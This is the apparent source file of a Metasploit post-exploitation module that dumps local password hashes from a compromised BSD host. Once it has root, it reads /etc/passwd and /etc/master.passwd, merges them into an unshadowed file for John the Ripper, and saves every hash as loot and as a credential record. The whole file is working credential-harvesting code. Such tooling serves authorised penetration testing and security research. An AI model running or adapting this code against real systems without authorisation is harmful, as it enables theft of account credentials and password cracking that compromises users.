Path: blob/master/modules/post/bsd/gather/hashdump.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post module that collects local account password hashes from a BSD host
# through an existing session running as root.
#
# It requests /etc/passwd and /etc/master.passwd via read_file, merges them
# into one "unshadowed" listing, and records the result in the framework:
# up to three loot entries (passwd, master.passwd, bsd.hashes) and one
# credential record per merged line.
#
# On the target, the visible footprint in this file is limited to the root
# check and the two read_file calls; how read_file fetches the contents
# depends on the session type and is not shown here.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  # NOTE(review): is_root? is presumably supplied by this Linux mixin even
  # though the module targets BSD - confirm against the mixin.
  include Msf::Post::Linux::Priv
  include Msf::Auxiliary::Report

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged with the
  #   values below through update_info
  def initialize(info = {})
    details = {
      'Name' => 'BSD Dump Password Hashes',
      'Description' => %q{Post module to dump the password hashes for all users on a BSD system.},
      'License' => MSF_LICENSE,
      'Author' => ['bcoles'],
      'Platform' => ['bsd'],
      'SessionTypes' => ['shell', 'meterpreter'],
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [],
        'Reliability' => []
      }
    }

    super(update_info(info, details))
  end

  # Module entry point: fetches both account files, stores copies as loot,
  # merges them, and records one credential per merged line.
  #
  # Aborts with Failure::NoAccess when the session is not root, and returns
  # early when the merge produces nothing.
  def run
    fail_with(Failure::NoAccess, 'You must run this module as root!') unless is_root?

    # to_s turns a nil result from read_file into an empty string.
    passwd = read_file('/etc/passwd').to_s
    unless passwd.blank?
      loot_path = store_loot('passwd', 'text/plain', session, passwd, 'passwd', 'BSD passwd file')
      vprint_good("passwd saved in: #{loot_path}")
    end

    master_passwd = read_file('/etc/master.passwd').to_s
    unless master_passwd.blank?
      loot_path = store_loot('master.passwd', 'text/plain', session, master_passwd, 'master.passwd', 'BSD master.passwd file')
      vprint_good("master.passwd saved in: #{loot_path}")
    end

    # Unshadow passwords
    john_file = unshadow(passwd, master_passwd)
    return if john_file.empty?

    john_file.each_line do |entry|
      # Field 0 is the account name, field 1 the password hash.
      username, pw_hash = entry.split(':')

      jtr_format = Metasploit::Framework::Hashes.identify_hash(pw_hash)
      # Override the default: fall back to a generic format list when
      # identify_hash returns an empty value.
      jtr_format = 'des,bsdi,sha512,crypt' if jtr_format.empty?

      cred = {
        jtr_format: jtr_format,
        origin_type: :session,
        post_reference_name: refname,
        private_type: :nonreplayable_hash,
        private_data: pw_hash,
        session_id: session_db_id,
        username: username,
        workspace_id: myworkspace_id
      }

      create_credential(cred)
      print_good(entry.chomp)
    end

    loot_path = store_loot('bsd.hashes', 'text/plain', session, john_file, 'unshadowed.passwd', 'BSD Unshadowed Password File')
    print_good("Unshadowed Password File: #{loot_path}")
  end

  # Merges passwd and master.passwd contents into a single listing in which
  # the ":*:" placeholder of each passwd line is replaced by the hash field
  # from master.passwd.
  #
  # Entries whose password field is exactly "*" or "!" are skipped. The
  # patterns match the account name with \w*, so only names made of word
  # characters are matched; other lines contribute nothing.
  #
  # @param pf [String] contents of /etc/passwd
  # @param sf [String] contents of /etc/master.passwd
  # @return [String] merged lines, or an empty string when nothing matched
  def unshadow(pf, sf)
    merged = ''

    sf.each_line do |master_entry|
      # Second colon-separated field: the password hash.
      pass = master_entry.scan(/^\w*:([^:]*)/).join
      next if ['*', '!'].include?(pass)

      # First field: the account name, used to find the passwd line(s).
      user = master_entry.scan(/(^\w*):/).join
      owner = /^#{user}:/

      pf.each_line do |passwd_entry|
        merged << passwd_entry.gsub(/:\*:/, ":#{pass}:") if passwd_entry.match(owner)
      end
    end

    merged
  end
end